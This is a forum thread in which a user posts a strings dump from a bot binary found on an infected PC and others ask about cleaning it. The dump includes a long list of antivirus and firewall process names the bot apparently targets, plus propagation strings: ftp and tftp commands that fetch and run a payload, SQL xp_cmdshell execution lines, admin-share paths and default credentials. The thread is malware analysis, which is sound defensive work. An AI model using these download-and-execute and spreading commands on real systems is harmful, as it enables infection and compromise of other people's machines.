MSCCN32.EXE
MSCMAN.EXE
MSCONFIG.EXE
MSDM.EXE
MSDOS.EXE
MSIEXEC16.EXE
MSINFO32.EXE
MSLAUGH.EXE
MSMGT.EXE
MSMSGRI32.EXE
MSSMMC32.EXE
MSSYS.EXE
MSVXD.EXE
MU0311AD.EXE
MWATCH.EXE
N32SCANW.EXE
NAV.EXE
AUTO-PROTECT.NAV80TRY.EXE
NAVAP.NAVAPSVC.EXE
NAVAPSVC.EXE
NAVAPW32.EXE
NAVDX.EXE
NAVENGNAVEX15.NAVLU32.EXE
NAVLU32.EXE
NAVNT.EXE
NAVSTUB.EXE
NAVW32.EXE
NAVWNT.EXE
NC2000.EXE
NCINST4.EXE
NDD32.EXE
NEOMONITOR.EXE
NEOWATCHLOG.EXE
NETARMOR.EXE
NETD32.EXE
NETINFO.EXE
NETMON.EXE
NETSCANPRO.EXE
NETSPYHUNTER-1.2.EXE
NETSTAT.EXE
NETUTILS.EXE
NISSERV.EXE
NISUM.EXE
NMAIN.EXE
NOD32.EXE
NORMIST.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NOTSTART.EXE
NPF40_TW_98_NT_ME_2K.EXE
NPFMESSENGER.EXE
NPROTECT.EXE
NPSCHECK.EXE
NPSSVC.EXE
NSCHED32.EXE
NSSYS32.EXE
NSTASK32.EXE
NSUPDATE.EXE
NT.EXE
TSCAN.EXE
NTVDM.EXE
NTXconfig.EXE
NUI.EXE
NUPGRADE.EXE
NUPGRADE.EXE
NVARCH16.EXE
NVC95.EXE
NVSVC32.EXE
NWINST4.EXE
NWSERVICE.EXE
NWTOOL16.EXE
OLLYDBG.EXE
ONSRVR.EXE
OPTIMIZE.EXE
OSTRONET.EXE
OTFIX.EXE
OUTPOST.EXE
OUTPOST.EXE
OUTPOSTINSTALL.EXE
OUTPOSTPROINSTALL.EXE
PADMIN.EXE
PANIXK.EXE
PATCH.EXE
PAVCL.EXE
PAVPROXY.EXE
PAVSCHED.EXE
PAVW.EXE
PCC2002S902.EXE
PCC2K_76_1436.EXE
PCCIOMON.EXE
PCCNTMON.EXE
PCCWIN97.EXE
PCCWIN98.EXE
PCDSETUP.EXE
PCFWALLICON.EXE
PCIP10117_0.EXE
PCSCAN.EXE
PDSETUP.EXE
PENIS.EXE
PERISCOPE.EXE
PERSFW.EXE
PERSWF.EXE
PF2.EXE
PFWADMIN.EXE
PGMONITR.EXE
PINGSCAN.EXE
PLATIN.EXE
POP3TRAP.EXE
POPROXY.EXE
POPSCAN.EXE
PORTDETECTIVE.EXE
PORTMONITOR.EXE
POWERSCAN.EXE
PPINUPDT.EXE
PPTBC.EXE
PPVSTOP.EXE
PRIZESURFER.EXE
PRMT.EXE
PRMVR.EXE
PROCDUMP.EXE
PROCESSMONITOR.EXE
PROCEXPLORERV1.0.EXE
PROGRAMAUDITOR.EXE
PROPORT.EXE
PROTECTX.EXE
PSPF.EXE
PURGE.EXE
PUSSY.EXE
PVIEW95.EXE
QCONSOLE.EXE
QSERVER.EXE
RAPAPP.EXE
RAV7.EXE
RAV7WIN.EXE
RAV8WIN32ENG.EXE
RAY.EXE
RB32.EXE
RCSYNC.EXE
REALMON.EXE
REGED.EXE
REGEDIT.EXE
REGEDT32.EXE
RESCUE.EXE
RESCUE32.EXE
RRGUARD.EXE
RSHELL.EXE
RTVSCAN.EXE
RTVSCN95.EXE
RULAUNCH.EXE
RUN32DLL.EXE
RUNDLL.EXE
RUNDLL16.EXE
RUXDLL32.EXE
SAFEWEB.EXE
SAHAGENT.EXE
SAVE.EXE
SAVENOW.EXE
SBSERV.EXE
SC.EXE
SCAM32.EXE
SCAN32.EXE
SCAN95.EXE
SCANPM.EXE
SCRSCAN.EXE
SCRSVR.EXE
SCVHOST.EXE
SD.EXE
SERV95.EXE
SERVICE.EXE
SERVLCE.EXE
SERVLCES.EXE
SETUPVAMEEVAL.EXE
SETUP_FLOWPROTECTOR_US.EXE
SFC.EXE
SGSSFW32.EXE
SH.EXE
SHELLSPYINSTALL.EXE
SHN.EXE
SHOWBEHIND.EXE
SMC.EXE
SMS.EXE
SMSS32.EXE
SOAP.EXE
SOFI.EXE
SPERM.EXE
SPF.EXE
SPHINX.EXE
SPOLER.EXE
SPOOLCV.EXE
SPOOLSV32.EXE
SPYXX.EXE
SREXE.EXE
SRNG.EXE
SS3EDIT.EXE
SSGRATE.EXE
SSG_4104.EXE
ST2.EXE
START.EXE
STCLOADER.EXE
SUPFTRL.EXE
SUPPORT.EXE
SUPPORTER5.EXE
SVC.EXE
SVCHOSTC.EXE
SVCHOSTS.EXE
SVSHOST.EXE
SWEEP95.EXE
SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE
SYMPROXYSVC.EXE
SYMTRAY.EXE
SYSEDIT.EXE
SYSTEM.EXE
SYSTEM32.EXE
SYSUPD.EXE
TASKMG.EXE
TASKMO.EXE
TASKMON.EXE
TAUMON.EXE
TBSCAN.EXE
TC.EXE
TCA.EXE
TCM.EXE
TDS-3.EXE
TDS2-98.EXE
TDS2-NT.EXE
TEEKIDS.EXE
TFAK.EXE
TFAK5.EXE
TGBOB.EXE
TITANIN.EXE
TITANINXP.EXE
TRACERT.EXE
TRICKLER.EXE
TRJSCAN.EXE
TRJSETUP.EXE
TROJANTRAP3.EXE
TSADBOT.EXE
TVMD.EXE
TVTMD.EXE
UNDOBOOT.EXE
UPDAT.EXE
UPDATE.EXE
UPDATE.EXE
UPGRAD.EXE
UTPOST.EXE
VBCMSERV.EXE
VBCONS.EXE
VBUST.EXE
VBWIN9X.EXE
VBWINNTW.EXE
VCSETUP.EXE
VET32.EXE
VET95.EXE
VETTRAY.EXE
VFSETUP.EXE
VIR-HELP.EXE
VIRUSMDPERSONALFIREWALL.EXE
VNLAN300.EXE
VNPC3000.EXE
VPC32.EXE
VPC42.EXE
VPFW30S.EXE
VPTRAY.EXE
VSCAN40.EXE
VSCENU6.02D30.EXE
VSCHED.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSISETUP.EXE
VSMAIN.EXE
VSMON.EXE
VSSTAT.EXE
VSWIN9XE.EXE
VSWINNTSE.EXE
VSWINPERSE.EXE
W32DSM89.EXE
W9X.EXE
WATCHDOG.EXE
WEBDAV.EXE
WEBSCANX.EXE
WEBTRAP.EXE
WFINDV32.EXE
WGFE95.EXE
WHOSWATCHINGME.EXE
WIMMUN32.EXE
WIN-BUGSFIX.EXE
WIN32.EXE
WIN32US.EXE
WINACTIVE.EXE
WINDOW.EXE
WINDOWS.EXE
WININETD.EXE
WININIT.EXE
WININITX.EXE
WINLOGIN.EXE
WINMAIN.EXE
WINNET.EXE
WINPPR32.EXE
WINRECON.EXE
WINSERVN.EXE
WINSSK32.EXE
WINSTART.EXE
WINSTART001.EXE
WINTSK32.EXE
WINUPDATE.EXE
WKUFIND.EXE
WNAD.EXE
WNT.EXE
WRADMIN.EXE
WRCTRL.EXE
WSBGATE.EXE
WUPDATER.EXE
WUPDT.EXE
WYVERNWORKSFIREWALL.EXE
XPF202EN.EXE
ZAPRO.EXE
ZAPSETUP3001.EXE
ZATUTOR.EXE
ZONALM2601.EXE
ZONEALARM.EXE
_AVP32.EXE
_AVPCC.EXE
_AVPM.EXE
HIJACKTHIS.EXE
F-AGOBOT.EXE
PandaAVEngine.exe
sysinfo.exe
mscvb32.exe
Penis32.exe
bbeagle.exe
SysMonXP.exe
winupd.exe
winsys.exe
ssate.exe
rate.exe
d3dupdate.exe
irun4.exe
i11r54n4.exe
plscd.exe
%s%s.exe
ftp.exe
cmd.exe
tftp.exe -i get
C:\WINDOWS\System32\plscd.exe
RestartApp.exe

Raw Strings:
--------------------------------------------------
File: plscd_dmp.exe_
MD5: 959ad87707459cf3812da1a059ee66b1
Size: 3448834

More to come...

~digitalk2003

[digitalk2003]

Continuation of my previous post...

Interesting ASCII strings:
!This program cannot be run in DOS mode.
0Rich
UnPacKcN

`.rsrc
Themida (//indication of mechanisms to hide and/or protect malicious code)
...
GET / HTTP/1.0
Host: %s
Authorization: Negotiate %s
n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
@format != NULL
sprintf.c
string != NULL
Client
Ignore
Normal
Free
Error: memory allocation: bad memory block type.
Invalid allocation size: %u bytes.
Client hook allocation failure.
Client hook allocation failure at file %hs line %d.
dbgheap.c
_CrtCheckMemory()
_pFirstBlock == pOldBlock
_pLastBlock == pOldBlock
fRealloc || (!fRealloc && pNewBlock == pOldBlock)
_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLOCK_TYPE(nBlockUse)
pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
_CrtIsValidHeapPointer(pUserData)
Allocation too large or negative: %u bytes.
Client hook re-allocation failure.
Client hook re-allocation failure at file %hs line %d.
_pFirstBlock == pHead
_pLastBlock == pHead
pHead->nBlockUse == nBlockUse
pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
DAMAGE: after %hs block (#%d) at 0x%08X.
DAMAGE: before %hs block (#%d) at 0x%08X.
_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)
Client hook free failure.
memory check error at 0x%08X = 0x%02X, should be 0x%02X.
%hs located at 0x%08X is %u bytes long.
%hs allocated at file %hs(%d).
DAMAGE: on top of Free block at 0x%08X.
DAMAGED
_heapchk fails with unknown return value!
_heapchk fails with _HEAPBADPTR.
_heapchk fails with _HEAPBADEND.
_heapchk fails with _HEAPBADNODE.
_heapchk fails with _HEAPBADBEGIN.
Bad memory block found at 0x%08X.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
Object dump complete.
crt block at 0x%08X, subtype %x, %u bytes long.
normal block at 0x%08X, %u bytes long.
client block at 0x%08X, subtype %x, %u bytes long.
{%ld}
%hs(%d) :
#File Error#(%d) :
Dumping objects ->
Data: <%s> %s
%.2X
Detected memory leaks!
Total allocations: %ld bytes.
Largest number used: %ld bytes.
%ld bytes in %ld %hs Blocks.
?dbgdel.cpp
onexit.c
fclose.c
stream != NULL
str != NULL
*mode != _T('\')
mode != NULL
*file != _T('\')
fopen.c
file != NULL
mbstowcs.c
s != NULL
sscanf.c
vsprintf.c
fgets.c
strupr.c
fprintf.c
fseek.c
("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)
_flsbuf.c
(8PX
700WP
`h````
ppxxxx
(null)
output.c
ch != _T('\')
Assertion Failed
Error
Warning
%s(%d) : %s
Assertion failed!
Assertion failed:
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
wsprintfA
user32.dll
Microsoft Visual C++ Debug Library
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
(Press Retry to debug the application)
Module:
File:
Line:
Expression:
For information on how your program can cause an assertion
failure, see the Visual C++ documentation on asserts.
<program name unknown>
dbgrpt.c
szUserMessage != NULL
mlock.c
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
tidtable.c
...
IsProcessorFeaturePresent
KERNEL32
e+000
_file.c
_freebuf.c
_filbuf.c
_open.c
filename != NULL
stream.c
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
setlocal.c
input.c
_sftbuf.c
flag == 0 || flag == 1
ftell.c
stdenvp.c
stdargv.c
a_env.c
ioinit.c
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
_getbuf.c
winsig.c
GetLastActivePopup
GetActiveWindow
MessageBoxA
osfinfo.c
inittime.c
initnum.c
initmon.c
initctyp.c
...
(country references - potential targets?)
Paraguay
Uruguay
Chile
Ecuador
Argentina
Peru
Colombia
Venezuela
Dominican Republic
South Africa
Panama
Luxembourg
Costa Rica
Switzerland
Guatemala
Canada
Spanish - Modern Sort
Australia
English
Austria
German
Belgium
Mexico
Spanish
Basque
weden
Swedish
Iceland
Icelandic
France
French
Finland
Finnish
Spain
Spanish - Traditional Sort
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
...
(time and date calculations)
MB_CUR_MAX == 1 || MB_CUR_MAX == 2
ungetc.c
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
tzset.c
1#QNAN
1#INF
1#IND
1#SNAN
chsize.c
size >= 0
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
am/pm
...
a_cmp.c
cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0
setenv.c
string too long
invalid string position
Unknown exception
beagle1
%s%s
http://%s:%s/%s
12[%s]: Exploiting IP: %s.
4>>
YZqbgff
UNKNOWN
WIN 2000
uws2_32.dll
uws2_32.dll
duqcomctl32.dll
duqcomctl32.dll
duqcomctl32.dll
WIN XP
qws2_32.dll
:wadvapi32.dll
WIN 2003
wadvapi32.dll
WIN NT4
wwwwunknown.dll
vwwwunknown.dll
uwwwunknown.dll
wkernel32.dll
swwwunknown.dll
rwwwunknown.dll
wkernel32.dll
neTmaNiac (//author signature)
netmaniac was here
12/12/04 13:13:13
netninjaz_place
131.131.131.131
3.72.0.0
3.72.0.0
[%s]: Connected to %s
tftp -i %s get %s
echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe
12[%s]: Exploiting IP: %s.
MARB
MEOW
MEOW(
MEOW
\\%s\pipe\epmapper
12[TFTP]: File transfer complete to IP: %s
4>>
12[%s]: Exploiting IP: %s.
...
%s// %s.
root
admin
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET %s'
EXEC master..xp_cmdshell '%s'
[TFTP]: File transfer complete to IP: %s
[%s]: Exploiting IP: (%s:%d) User: (%s/%s).
12[%s]: Exploiting IP: %s.
Admin$\system32
c$\winnt\system32
c$\windows\system32
%s\%s\%s
(no password)
12[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)
\\%s
%s\ipc$
version
ver1.5
C:\%s
cmd[003]%s|%i|
pleaz_run%s
pleaz_run_done
passed
nd %s %s
(no password)
12[%s]: Exploiting IP: %s, Password: (%s)
pass_pleaz
pass_pleaz%s
OPtest
v1.1
OPtest
v1.2 (//software test)
Your client version is outdated!
v1.1
v1.2
C:\a.exe
+OK REDY
+OK RCVD
C:\a.exe
Error Executing File
12[%s]: Exploiting IP: %s.
PWD715
PWD14438136782715101980
connected.
SFT05%i
[%s]: Exploiting IP: %s.
1.1.1.1.1.1
v9.1.4691.0+1
v8.5.3572
[%s (%s)]: Exploiting IP: %s.
...
Exploit and bot statistics components
12[SCAN]: Exploit Statistics:
%s: %d,
12 Total: %d in %s.
12[SCAN]: Current IP: %s.
4<<[SCAN]: Scan not active.
12[TFTP]: Server started on Port: %d, File: %s, Request: %s.
12[TFTP]: Failed to start server, error: <%d>.
12[FTP]: Server started on Port: %d, File: %s, Request: %s.
12[FTP]: Failed to start server, error: <%d>.
12[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.
12[HTTPD]: Failed to start server, error: <%d>.
%d.%d.%d.%d
socket open failed
sendto() socket failed. sent = %d <%d>.
recvfrom() socket failed
Socket open.
Socket closed.
12[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.
12[SCAN]: IP: %s, Port %d is open.
12[SCAN]: Failed to initialize critical section.
12[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.
12[SCAN]: Failed to start worker thread, error: <%d>.
12[SCAN]: Finished at %s:%d after %d minute(s) of scanning.
12-[Alias List]-
12%d. %s = %s
12[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s
12-[Logs]-
12[LOGS]: Cleared.
12[LOGS]: Cleared.
12[LOG]: Begin
12[LOG]: List complete.
DISPLAY
...
Communications
WNetAddConnection2A
WNetAddConnection2W
WNetCancelConnection2A
WNetCancelConnection2W
shell32.dll
ShellExecuteA
SHChangeNotify
odbc32.dll
SQLDriverConnect
SQLSetEnvAttr
SQLExecDirect
SQLAllocHandle
SQLFreeHandle
SQLDisconnect
avicap32.dll
capCreateCaptureWindowA
capGetDriverDescriptionA
Kernel32.dll failed. <%d>
User32.dll failed. <%d>
Advapi32.dll failed. <%d>
Gdi32.dll failed. <%d>
Ws2_32.dll failed. <%d>
Wininet.dll failed. <%d>
Icmp.dll failed. <%d>
Netapi32.dll failed. <%d>
Dnsapi.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Mpr32.dll failed. <%d>
Shell32.dll failed. <%d>
Odbc32.dll failed. <%d>
Avicap32.dll failed. <%d>
12[MAIN]: DLL test complete.
%s Error: %s <%d>.
mIRC
mIRC
explorer.exe
%s %s
SeShutdownPrivilege
%sdel.bat
@echo off
:repeat
del "%%1"
if exist "%%1" goto repeat
del "%s"
%%comspec%% /c %s %s
Added
Delete
Deleted
List
Listed
Start
Started
Stop
Stopped
Pause
Paused
Continue
Continued
12[NET]: %s service: '%s'.
12[NET]: Error with service: '%s'. %s
12[NET]: %s: No service specified.
The specified database does not exist.
The handle does not have the required access right.
The specified service name is invalid.
The handle is invalid.
The service binary file could not be found.
An instance of the service is already running.
The database is locked.
The service depends on a service that does not exist or has been marked for deletion.
The service depends on another service that has failed to start.
The service has been disabled.
The specified service does not exist.
The service could not be logged on. The account does not have the correct access rights.
The service has been marked for deletion.
A thread could not be created for the service.
The process for the service was started, but it did not call StartServiceCtrlDispatcher.
The service cannot be stopped because other running services are dependent on it.
The requested control code is undefined.
The requested control code is not valid, or it is unacceptable to the service.
The requested control code cannot be sent to the service because the state of the service.
The service has not been started.
The system is shutting down.
An unknown error occurred: <%ld>
The following Windows services are registered:
Stopped
Starting
Stoping
Running
Continuing
Pausing
Paused
Unknown
%s: %s (%s)
12[NET]: %s share: '%s'.
12[NET]: %s: Error with share: '%s'. %s
12[NET]: %s: No share specified.
Share name: Resource: Uses: Desc:
%-14S %-24S %-6u %-4s
12[NET]: Share list error: %s <%ld>
12[NET]: %s username: '%s'.
12[NET]: %s: Error with username: '%s'. %s
12[NET]: %s: No username specified.
Account: %S
Full Name: %S
User Comment: %S
Comment: %S
Guest
User
Administrator
Unknown
Privilege Level: %s
Auth Flags: %d
Home Directory: %S
Parameters: %S
Password Age: %d
Bad Password Count: %d
Number of Logi
ns: %d
Last Logon: %d
Last Logoff: %d
Logon Server: %S
Workstations: %S
Country Code: %d
User's Language: %d
Max. Storage: %d
Units Per Week: %d
12[NET]: User info error: <%ld>
Username accounts for local system:
12[NET]: An access violation has occured.
%S
12[NET]: User list error: %s <%ld>
Total users found: %d.
Access denied.
Level parameter is invalid.
The name is invalid.
Invalid parameter.
Not enough memory.
This network request is not supported.
Server name not found.
Share not found.
Duplicate share name.
Invalid for redirected resource.
Device or directory does not exist.
The computer name is invalid.
The operation is allowed only on the primary domain controller of the domain.
The group already exists.
The user account already exists.
The password is shorter than required (or does not meet the password policy requirement.)
Network connection not found.
A general failure occurred in the network hardware.
The user name could not be found.
An unknown error occurred.
12[NET]: Message sent successfully.
12[NET]: %s <Server: %S> <Message: %S>
12[FLUSHDNS]: Error getting ARP cache: <%d>.
12[FLUSHDNS]: Unable to allocation ARP cache.
12[FLUSHDNS]: ARP cache is empty.
12[FLUSHDNS]: Not supported by this system.
12[FLUSHDNS]: Error getting ARP cache: <%d>.
%d.%d.%d.%d
12[PING]: Error sending pings to %s.
12[PING]: Finished sending pings to %s.
12[UDP]: Error sending pings to %s.
12[UDP]: Finished sending packets to %s.

This has been an interesting inital analysis, though I've seen cleaner code.

Cheers,

digitalk2003

[DarkJester]

digitalk2003 were tho's reports genirated automagically? if so what tools did you use?

[Freakazoid]

Thanks a lot for your analysis digitalk2003.

What can I do to clean it? Where can I find the cleaner code or use it? Would be nice if you could help me.

Thanks

[x@ros2000]

digitalk2003 were tho's reports genirated automagically? if so what tools did you use?

My guess goes here...
http://labs.idefense...are/malcode.php

[Freakazoid]

So how can I use the cleaner code you talked about????

/edit: The 2 modules i found are there because i have installed daemon tools. Thanks to this post: http://www.governmen...showtopic=25681 i could find this out.

Thanks for all your help. I posted my problem in several forums. This one was the best, with the best answers.

But I am still interested in the cleaner code

[fightie]

So how can I use the cleaner code you talked about????

I believe digitalk2003 meant the code was messy, and he'd seen cleaner code, meaning "code that is cleaner than this" not "code that can clean this." Sorry to disappoint you.

[digitalk2003]

Been under the weather for a week but I'm feeling much better.

x@ros2000 was correct. I used the SysAnalyzer by iDefense labs. As far as my reference to cleaner code, I was refering to the actual coding of the binary and its sequence of executions. During processing of the binary, there will often be garbled code, as well as, ASCII text sections. This is a function of code execution. However, many trojans, bots, and virus/worms are notorious for not protecting some key functions once the binary file executes.

Binary analysis will give you an indication of what is going on, what functions are being called, and also, in this case, what mechanisms are being used to obviscate the binary. It should also give you an indication of communication mechanisms, either through IRC, HTTP, HTTPS, ADS through HTTP, custom encrypted sessions, or others. An understanding of rookits, trojans, virii/worms, and bots is essential to picking up on how these things work.

Just my $0.02. Let me know if I can clarify.

Cheers,

~digitalk2003